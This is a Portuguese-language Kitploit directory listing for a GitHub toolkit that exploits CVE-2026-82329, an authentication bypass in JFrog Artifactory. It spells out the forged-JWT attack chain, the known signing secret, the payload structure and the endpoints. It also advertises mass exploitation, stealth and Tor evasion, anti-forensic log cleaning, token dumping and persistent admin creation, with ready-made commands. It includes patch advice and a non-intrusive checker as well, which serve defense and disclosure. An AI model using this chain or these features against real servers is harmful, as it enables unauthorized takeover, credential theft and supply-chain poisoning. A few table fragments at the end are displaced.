Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-82329-PoC-Exploit — Kit de exploração e deteção para CVE-2026-82329, um bypass de autenticação do JFrog Artifactory. Forja JWTs de join para gerar tokens de administrador; inclui um verificador de versão não intrusivo. | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
Ferramentas DefensivasScanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebColeta de InformaçõesVirtualização para SegurançaTestes de PenetraçãoAutenticação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Red Teaming
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

Kit de exploração e deteção para CVE-2026-82329, um bypass de autenticação do JFrog Artifactory. Forja JWTs de join para gerar tokens de administrador; inclui um verificador de versão não intrusivo.

Ver Repositório
há 11h 31mAinda não revisado
Compartilhar

CVEPoC

CVE‑2026‑82329 – Toolkit de Bypass de Autenticação do JFrog Artifactory

Python 3.8+ CVSS Author Artifactory

APENAS USO ÉTICO – TESTES DE SEGURANÇA AUTORIZADOS Este repositório fornece ferramentas apenas para profissionais de segurança autorizados, blue teams e testadores de penetração. O acesso não autorizado a sistemas de computador é ilegal sob o CFAA (EUA), Computer Misuse Act (Reino Unido), TCK 243/244 (Turquia) e leis similares em todo o mundo.


📖 Visão Geral da Vulnerabilidade

CVE‑2026‑82329 é uma vulnerabilidade crítica de bypass de autenticação no JFrog Artifactory auto-hospedado (versões 7.111.x até 7.161.x) que permite a um atacante não autenticado obter um token de administrador completo da plataforma abusando do mecanismo de entrada no cluster do JFrog Access.

Como funciona

  1. Confiança em chave de entrada em branco – O JFrog Access confia em uma chave de entrada fantasma cujo valor é uma string vazia. Seu segredo de assinatura é, portanto, o valor determinístico 32 * 0x20 (espaços).
  2. JWT de entrada forjado – um atacante forja um JWT HS256 assinado com este segredo conhecido e kid = SHA256("").
  3. Token SERVICE emitido – POST /access/api/v1/registry/join retorna um token SERVICE com scp=admin sem qualquer autenticação.
  4. Troca por token de admin – POST /access/api/v1/tokens com scope=applied-permissions/admin&audience=* produz um token de admin completo da plataforma.
  5. Impacto – tomada completa do repositório, roubo de tokens, criação de usuário admin, envenenamento de artefatos, ataques à cadeia de suprimentos e movimento lateral para serviços conectados (Xray, Mission Control, Distribution). Atualize imediatamente!

Versões Afetadas

  • 7.111.4 – 7.111.20 – vulnerável
  • 7.117.0 – 7.117.27 – vulnerável
  • 7.125.0 – 7.125.19 – vulnerável
  • 7.133.0 – 7.133.28 – vulnerável
  • 7.146.0 – 7.146.36 – vulnerável
  • 7.161.0 – 7.161.19 – vulnerável

Correção

  • Atualize para 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38 ou 7.161.20 ou mais recente.
  • Se a atualização não for possível, restrinja o acesso de rede ao Artifactory (nunca o exponha à internet) e rotacione todos os tokens de admin como solução temporária.

🧰 Ferramentas

FerramentaPropósitoUsuário Pretendido
exploit.pyToolkit completo weaponizado com forja de JWT, troca por token de admin, criação de usuário admin, varredura em massa, modo stealth, rotação de proxy, menu interativo e cadeia de ataque completa.Red teams / pentesters autorizados
safechecker.pyVerificador de vulnerabilidade não intrusivo que detecta a versão do Artifactory, valida a exposição e avalia o risco sem obter qualquer token ou executar qualquer payload. Gera relatórios JSON.Blue teams / auditores de segurança

📊 Comparação de Recursos

Recursoexploit.pysafechecker.py
Detecção de vulnerabilidade✅✅
Detecção de versão✅✅
JWT de entrada forjado✅❌
Emissão de token de serviço✅❌
Troca por token de admin✅❌
Criação de usuário admin✅❌
Listar repositórios✅❌
Listar usuários✅❌
Dump de configuração✅❌
Dump de tokens✅❌
Cadeia de ataque completa✅❌
Menu interativo✅❌
Varredura em massa (multi-thread)✅✅
Suporte a proxy✅✅
Rotação de proxy✅❌
Suporte a Tor (anonimato)✅❌
Rotação de User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Limitador de taxa adaptativo✅❌
Modo não intrusivo (seguro)❌✅
Relatório de versão✅✅
Verificação de acesso anônimo❌✅
Relatório JSON✅

🎯 Resumo de Casos de Uso

CenárioFerramenta Recomendada
Blue Team – verificar se seu Artifactory é vulnerávelsafechecker.py
Auditoria de Segurança – avaliação de vulnerabilidade não intrusivasafechecker.py
Red Team – teste de penetração autorizado com exploração completaexploit.py
Bug Bounty – teste de divulgação responsávelsafechecker.py
Varredura em Massa – verificar múltiplos alvos quanto à vulnerabilidadeexploit.py (somente detecção)
Resposta a Incidentes – verificar se os sistemas foram comprometidossafechecker.py

⚙️ Instalação

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 Parâmetros

Parâmetros do exploit.py

ParâmetroDescrição
-u, --urlURL de um único alvo Artifactory (ex.: http://artifactory.example.com:8082)
-f, --fileArquivo contendo lista de alvos (um por linha) para varredura em massa
--create-adminCriar usuário admin persistente (formato: USER:PASS)
--keep-adminManter usuário admin criado (não limpar após a varredura)
--token-onlyApenas imprimir token de admin (alvo único)
--interactiveMenu interativo após a exploração
--service-idService ID para o JWT de entrada (padrão: jfrt@01)
-t, --threadsNúmero de threads para múltiplos alvos (padrão: 10)
--timeoutTimeout da requisição (padrão: 25s)
--retryMáximo de tentativas (padrão: 3)
--proxyProxy HTTP/HTTPS (ex.: http://127.0.0.1:8080)
--proxy-listArquivo com proxies para rotação (um por linha)
--jitterJitter aleatório (0‑2 seg) entre requisições
--stealthAtivar modo stealth (rotação de UA + X‑Forwarded‑For)
--curl-cffiUsar curl_cffi para impersonação de fingerprint TLS
--fullAtaque completo: todos os módulos
--dump-configDump da configuração do sistema
--dump-tokensDump de todos os tokens de acesso
--list-reposListar repositórios
--list-usersListar usuários
--detect

Parâmetros do safechecker.py

ParâmetroDescrição
-u, --urlURL de um único alvo Artifactory (ex.: http://artifactory.example.com:8082)
-f, --fileArquivo contendo lista de alvos (um por linha)
-t, --threadsNúmero de threads para múltiplos alvos (padrão: 5)
--timeoutTimeout da requisição (padrão: 10s)
-v, --verboseSaída detalhada
-o, --outputSalvar relatório JSON em arquivo

💥 Cenários

#CenárioComando
1Verificação rápida de vulnerabilidadepython safechecker.py -u http://artifactory.example.com:8082
2Varredura detalhada com relatóriopython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3Auditoria em massa a partir de arquivopython safechecker.py -f targets.txt -t 10 -o audit.json
4Exploit somente detecçãopython exploit.py -u http://artifactory.example.com:8082 --detect
5Obter apenas token de adminpython exploit.py -u http://artifactory.example.com:8082 --token-only
6Ataque completo com menu interativopython exploit.py -u http://artifactory.example.com:8082 --interactive
7Criar usuário admin persistentepython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8Dump de configuraçãopython exploit.py -u http://artifactory.example.com:8082 --dump-config
9Listar repositórios e usuáriospython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10Exploit em massa com stealthpython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Rotação de proxy com Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 Endpoint e Cadeia de Exploração

O exploit usa os seguintes endpoints do JFrog e etapas de exploração:

EtapaMétodoEndpointDescrição
1. JoinPOST/access/api/v1/registry/joinJWT HS256 forjado → token SERVICE (scp=admin)
2. ExchangePOST/access/api/v1/tokenstoken SERVICE → token de admin da plataforma
3. ProveGET/artifactory/api/system/configurationProva de acesso somente para admin
4. PersistPUT/artifactory/api/security/users/{user}Criar usuário admin persistente
5. RevokeDELETE/access/api/v1/tokens/{id}Limpar tokens criados

Formato do Payload

root@kitploit:~
# Estrutura do JWT de entrada forjado
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Segredo de assinatura
secret = b"\x20" * 32

# Requisição de token de admin
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ Uso Responsável

  • Use estas ferramentas apenas em sistemas que você possui ou tem permissão escrita explícita para testar.
  • O acesso não autorizado é ilegal e antiético.
  • Os autores não são responsáveis por qualquer uso indevido.
  • Sempre siga as leis e regulamentos do seu país.

Este software é fornecido apenas para propósitos educacionais e testes de segurança autorizados.

Baixar ferramenta
✅
Limpeza de logs (anti-forense)✅❌
User‑Agent personalizado✅✅
Controle de verificação SSL✅✅
Somente detecção (sem troca por token de admin)
--exploitRealizar exploração completa
-o, --outputSalvar relatório JSON em arquivo
-v, --verboseSaída detalhada
-q, --quietModo silencioso